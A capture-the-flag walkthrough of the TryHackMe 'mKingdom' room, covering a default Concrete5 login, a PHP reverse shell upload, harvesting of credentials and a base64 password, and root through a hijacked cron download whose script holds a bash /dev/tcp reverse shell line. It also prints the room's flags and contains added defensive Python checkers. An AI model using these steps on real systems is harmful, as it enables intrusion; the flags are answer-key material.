mKingdom: TryHackMe Writeup

Ansul Kotadia
6 min read · Jun 17, 2024

mKingdom THM

Introduction

TryHackMe is a popular platform for learning cybersecurity through hands-on challenges. In this post, I’ll guide you through my experience with the mkingdom room. This room involves exploiting a web server to gain root access. Follow along to see how I navigated each step and overcame the challenges.

Step 1: Initial Nmap Scan

The first step is to perform an Nmap scan to discover open ports and services on the target machine:

nmap -sV -sC 10.10.201.21

The scan reveals that port 85 is hosting a web page. Checking it out in a browser, we get a message:

No luck here! Moving on…

Step 2: Directory Bruteforcing with Gobuster

Next, we use Gobuster to find hidden directories on the web server:

gobuster dir -u http://10.10.201.21:85 -w /usr/share/wordlists/dirb/common.txt

Gobuster discovers a directory /app.

Visiting this link in a browser, we find a website using the Concrete5 CMS. At the bottom of the page, there is a login link:

Step 3: Logging In

The login link at the bottom of the page takes us to the Concrete5 login form:

Trying a few basic login credentials, we find that the username admin with the password password works, and we are in!

Step 4: Exploiting File Upload Functionality

Navigate to System & Settings > Allowed File Types and add php as an allowed file type. This allows us to upload a PHP reverse shell.

Now download the script from php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell · GitHub and save it on your machine. Change the IP address and port to those of your own machine; in my case the IP is 10.6.74.42 and I set the port to 4444:

$ip = '127.0.0.1'; // CHANGE THIS to your listener IP (10.6.74.42 in my case)
$port = 1234; // CHANGE THIS to your listener port (4444 in my case)
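Step 4 works only because the CMS lets an administrator add php to the allowed upload types, so the allow list alone is the whole defence. As an added defensive example, not code from the page or from Concrete5, here is a Python upload check that keeps a built-in deny list of server-executable extensions that the admin setting cannot override, checks every extension component (so a double extension is caught), and compares the file's leading bytes against the declared type. The magic-byte table and the sample files are constructed for the example.

```python
import os

# Extensions an interpreter on the web server would execute; refused unconditionally,
# even if an administrator adds them to the CMS "Allowed File Types" setting.
FORBIDDEN_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps",
    "cgi", "pl", "py", "sh", "jsp", "asp", "aspx", "htaccess",
}

# Benign types the upload handler accepts, each with the leading bytes (magic)
# a genuine file of that type starts with. Constructed for this example.
ALLOWED_MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "pdf": [b"%PDF-"],
}

def validate_upload(filename, content, admin_allowed):
    """Decide whether an upload is stored. `admin_allowed` is the admin-configured
    allow list (the page's "Allowed File Types"); the built-in deny list overrides it,
    so adding 'php' there no longer opens an upload-to-shell path.
    Returns (accepted, reason)."""
    base = os.path.basename(filename)
    if "\x00" in base:
        return False, "null byte in filename"
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return False, "missing or empty extension"
    exts = parts[1:]
    # every extension component is checked, so 'shell.php.png' is refused as well
    for ext in exts:
        if ext in FORBIDDEN_EXTENSIONS:
            return False, f"server-executable extension '{ext}' is never allowed"
    final = exts[-1]
    if final not in admin_allowed:
        return False, f"extension '{final}' is not in the configured allow list"
    if final not in ALLOWED_MAGIC:
        return False, f"extension '{final}' has no content signature on file"
    if not any(content.startswith(magic) for magic in ALLOWED_MAGIC[final]):
        return False, f"content does not look like a '{final}' file"
    # a valid image header with PHP tags appended is still not an image we want
    if b"<?php" in content or b"<?=" in content:
        return False, "PHP opening tag embedded in content"
    return True, "accepted"

# Constructed inputs: a minimal PNG header and a harmless PHP snippet.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_PHP = b"<?php echo 'test'; ?>"

def demo():
    """Run the checker over the cases that matter for the page's scenario."""
    allowed = {"png", "jpg", "jpeg", "gif", "pdf", "php"}  # admin added 'php' here
    return {
        "image": validate_upload("logo.png", SAMPLE_PNG, allowed),
        "php": validate_upload("shell.php", SAMPLE_PHP, allowed),
        "double_ext": validate_upload("shell.php.png", SAMPLE_PHP, allowed),
        "png_named_php_body": validate_upload("pic.png", SAMPLE_PHP, allowed),
        "polyglot": validate_upload("pic.png", SAMPLE_PNG + SAMPLE_PHP, allowed),
    }

if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print(f"{name:20} {'ACCEPT' if ok else 'REJECT'}: {why}")
```

The point of the design is that the configurable setting can only narrow what is accepted, never widen it into interpreter-executed types, and that the server decides the type from the bytes rather than from the name alone.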

Step 5: Gaining Shell Access

Next, open the Files tab on the right side of the page, choose Upload Files and upload the file we just edited. Before opening the uploaded file's URL, start a netcat listener on port 4444 with:

nc -lvnp 4444

As soon as you open the uploaded file in the browser, the listener receives a shell on the machine:

Step 6: Stabilizing the Shell

Next, stabilize the netcat shell by running the following commands (for more information see How to stabilise netcat shells using Python (inkyvoxel.com)):

python -c 'import pty;pty.spawn("/bin/bash")'  # spawns a more feature-rich Bash shell
export TERM=xterm  # set the terminal type to xterm
# press Ctrl + Z to background the netcat shell, then run:
stty raw -echo; fg  # press Enter after this

Step 7: Enumeration and Finding Credentials

Checking the home directory, I see two users, mario and toad, but cannot cd into either of their directories: permission denied.

Therefore, navigate to /var/www/html/app/castle/application/config and find database.php containing database credentials:

Step 8: Switching to User Toad

Use the found credentials to switch to user toad:

su toad

Step 9: Lateral Movement to User Mario

Enumerate environment variables to find the base64-encoded PWD_token, decode it, and use the password to switch to user mario.

Exploring all the directories, I find nothing helpful, so the next step is lateral movement from toad to mario, working through the Linux privilege escalation checks from Linux Privilege Escalation | HackTricks | HackTricks

I run the following commands:

echo $PATH  # nothing interesting here
(env || set) 2>/dev/null  # dump all environment variables

Here we find PWD_token, which is base64-encoded. Decoding it gives the password 'ikaTeNTANtES', hopefully for the user mario.
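The token above is protected only by encoding, which is exactly what a hardening review should catch before an attacker does. As an added example, not from the page, the Python scanner below reads an `env`-style dump and reports variables whose name looks credential-like and whose value is base64 that hides readable text. The dump is constructed, and the encoded value decodes to the placeholder 'example-password', not to the room's credential.

```python
import base64
import binascii
import re

# variable names that usually hold credentials
SUSPICIOUS_NAME = re.compile(r"(pass|pwd|token|secret|key|cred)", re.IGNORECASE)
# the shape of a base64 string: alphabet, reasonable length, optional padding
BASE64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")

def decode_if_base64(value):
    """Return the decoded text if `value` is well-formed base64 that decodes to
    printable ASCII, otherwise None. Paths like /bin/bash use the same alphabet,
    so the shape test alone is not enough; the decode must also yield text."""
    if not BASE64_SHAPE.match(value) or len(value) % 4 != 0:
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and text.isprintable() else None

def parse_env_dump(text):
    """Parse NAME=value lines as printed by `env`."""
    env = {}
    for line in text.splitlines():
        if "=" in line and not line.startswith(" "):
            name, _, value = line.partition("=")
            env[name] = value
    return env

def find_encoded_secrets(env):
    """Scan a name->value mapping (os.environ or a parsed dump) and report variables
    with a credential-like name whose value is base64 hiding readable text.
    The decoded secret itself is deliberately not included in the report."""
    findings = []
    for name, value in env.items():
        if not SUSPICIOUS_NAME.search(name):
            continue
        decoded = decode_if_base64(value)
        if decoded is not None:
            findings.append({"name": name, "decoded_length": len(decoded),
                             "reason": "credential-like name with base64-encoded printable value"})
    return findings

# Constructed dump in the style of `env` output; PWD_token here is base64 of the
# placeholder string "example-password", not the credential from the room.
SAMPLE_ENV = """\
SHELL=/bin/bash
PWD_token=ZXhhbXBsZS1wYXNzd29yZA==
HOME=/home/toad
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LANG=en_US.UTF-8
"""

if __name__ == "__main__":
    for f in find_encoded_secrets(parse_env_dump(SAMPLE_ENV)):
        print(f"{f['name']}: {f['reason']} ({f['decoded_length']} chars)")
```

The report carries the variable name and the decoded length but never the decoded value, so its output can be written to a log or ticket without copying the secret around; the fix for a finding is to move the value into a file readable only by the service that needs it, not to encode it differently.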

Switch to user mario:

mario@mkingdom:/home$ cd mario
mario@mkingdom:~$ ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
mario@mkingdom:~$

Step 10: Capturing the User Flag

Navigate to Mario's home directory and find user.txt. Use the head command to view it, since the cat command is not allowed:

Question:

What is user.txt?

Answer: thm{030a769febb1b3291da1375234b84283}

Step 11: Privilege Escalation to Root

Next, I snoop around a bit but find no way to escalate to root.

So the next step is to upload pspy to the target, from https://github.com/DominicBreuker/pspy?tab=readme-ov-file

Follow the steps below:

1. Download the file pspy64 from the link given above onto your machine.

2. Start a web server on your own machine using the command:

python -m http.server

3. Now wget the file from your own machine onto the mkingdom machine:

wget http://YOUR_MACHINE_IP:8000/Desktop/pspy64 -O /tmp/pspy64

Next, add execute permission to the file and run it, as shown in the image below:

pspy prints a lot of information, but we are interested in the following:

Step 12: Domain Hijacking for Root Access

Here the command curl mkingdom.thm:85/app/castle/application/counter.sh runs with UID 0 (root), so if we can hijack the domain mkingdom.thm we can get root privileges.

To hijack mkingdom.thm, edit the /etc/hosts file and point the mkingdom.thm entry at your own machine's IP address; in my case it is 10.6.74.42:

Next, replicate the directory structure on your machine: as shown in the image below, create the same path (/app/castle/application/counter.sh) with a file counter.sh whose content is:

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.6.74.42/4444 0>&1

Next, start a web server on port 85 on your machine with the following command:

Then start a netcat listener on port 4444 as shown below, and soon we get root access to the machine!
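The root job above downloads counter.sh by hostname over plain HTTP, and that hostname is resolved from a file a low-privileged user could edit; any one of those three properties is worth an alert on a real host. As an added example (my code, not from the page, the room or pspy), the Python below parses process records written in the style of pspy's CMD lines (constructed sample lines, the first one mirroring the room's root command), flags root processes that download without TLS, from a name pinned in /etc/hosts, or hand the download to a shell, checks whether a file mode makes /etc/hosts world-writable, and shows the hash-pinning check a hardened version of the job would run before executing anything it fetched. The hostname updates.example.com and the hosts-file contents are assumed.

```python
import hashlib
import re
import stat

# pspy prints one record per observed process in the form
# "<timestamp> CMD: UID=<uid> PID=<pid> | <command line>"; this regex follows that style.
PSPY_LINE = re.compile(r"CMD:\s+UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s+(?P<cmd>.*)$")
# a host[:port][/path] or scheme://host[:port][/path] token on a command line
URL_TOKEN = re.compile(
    r"^(?:(?P<scheme>[a-z]+)://)?(?P<host>[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)"
    r"(?::(?P<port>\d+))?(?P<path>/\S*)?$"
)
PIPED_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b")

def parse_pspy(lines):
    """Turn pspy-style lines into {uid, pid, cmd} records; other lines are skipped."""
    records = []
    for line in lines:
        m = PSPY_LINE.search(line)
        if m:
            records.append({"uid": int(m.group("uid")), "pid": int(m.group("pid")),
                            "cmd": m.group("cmd")})
    return records

def extract_fetch_target(cmd):
    """Find the first curl/wget call in a command line and return its target URL parts."""
    tokens = cmd.split()
    for i, tok in enumerate(tokens):
        tool = tok.rsplit("/", 1)[-1]
        if tool not in ("curl", "wget"):
            continue
        for arg in tokens[i + 1:]:
            if arg in ("|", "||", "&&", ";"):
                break
            m = URL_TOKEN.match(arg)
            if m:
                # both tools default to plain http when no scheme is given
                return {"tool": tool, "scheme": m.group("scheme") or "http",
                        "host": m.group("host"), "path": m.group("path") or "/"}
    return None

def parse_hosts(text):
    """Collect every hostname pinned in an /etc/hosts file."""
    names = set()
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2:
            names.update(fields[1:])
    return names

def flag_privileged_remote_fetch(records, hosts_text):
    """Report root (UID 0) processes that download over an unauthenticated channel,
    from a name that /etc/hosts controls, or execute what they fetched."""
    pinned = parse_hosts(hosts_text)
    findings = []
    for rec in records:
        if rec["uid"] != 0:
            continue
        target = extract_fetch_target(rec["cmd"])
        if target is None:
            continue
        reasons = []
        if target["scheme"] != "https":
            reasons.append("download is not authenticated (no TLS)")
        if target["host"] in pinned:
            reasons.append("hostname is resolved from /etc/hosts, a local file")
        if PIPED_TO_SHELL.search(rec["cmd"]) or target["path"].endswith(".sh"):
            reasons.append("fetched content is treated as a shell script")
        if reasons:
            findings.append({"pid": rec["pid"], "host": target["host"], "reasons": reasons})
    return findings

def is_world_writable(mode):
    """True when a file mode (os.stat(...).st_mode) lets any user write the file;
    /etc/hosts must never be in that state on a host whose root jobs resolve names."""
    return bool(mode & stat.S_IWOTH)

def sha256_hex(content):
    return hashlib.sha256(content).hexdigest()

def verify_pinned(content, expected_sha256):
    """Hardened fetch step: hand downloaded bytes to an interpreter only if they match
    a hash pinned at deploy time, so a hijacked name yields a refusal, not a root shell."""
    return sha256_hex(content) == expected_sha256

# Constructed sample in pspy's output style. The first record mirrors the root job the
# page observed; the third is a root download that raises none of the three concerns.
SAMPLE_PSPY = [
    "2024/06/17 12:00:01 CMD: UID=0     PID=2451   | /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh",
    "2024/06/17 12:00:01 CMD: UID=1001  PID=2452   | /bin/bash",
    "2024/06/17 12:00:02 CMD: UID=0     PID=2453   | curl https://updates.example.com/Release",
]
# Constructed /etc/hosts content with the room's hostname pinned locally.
SAMPLE_HOSTS = "127.0.0.1 localhost\n127.0.1.1 mkingdom.thm mkingdom\n"

if __name__ == "__main__":
    for f in flag_privileged_remote_fetch(parse_pspy(SAMPLE_PSPY), SAMPLE_HOSTS):
        print(f"PID {f['pid']} fetches from {f['host']}: " + "; ".join(f["reasons"]))
```

The mitigations follow directly from the three reasons the scanner reports: keep /etc/hosts root-owned with mode 0644, fetch over HTTPS from a name the host does not resolve locally, and compare the download against a pinned hash (or a signature) before bash ever sees it, as verify_pinned does. The hash check is the one that holds even if the other two controls fail.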

Step 13: Capturing the Root Flag

We still don't have permission to use cat on root.txt, so use the head command instead to get the root flag:

Question:

What is root.txt?

Answer: thm{e8b2f52d88b9930503cc16ef48775df0}

Conclusion

This concludes the walkthrough for the mkingdom room on TryHackMe. Through various techniques such as directory bruteforcing, file upload exploitation, and privilege escalation, we were able to gain root access. This exercise highlights the importance of securing web applications and server configurations to prevent similar attacks. Happy hacking!
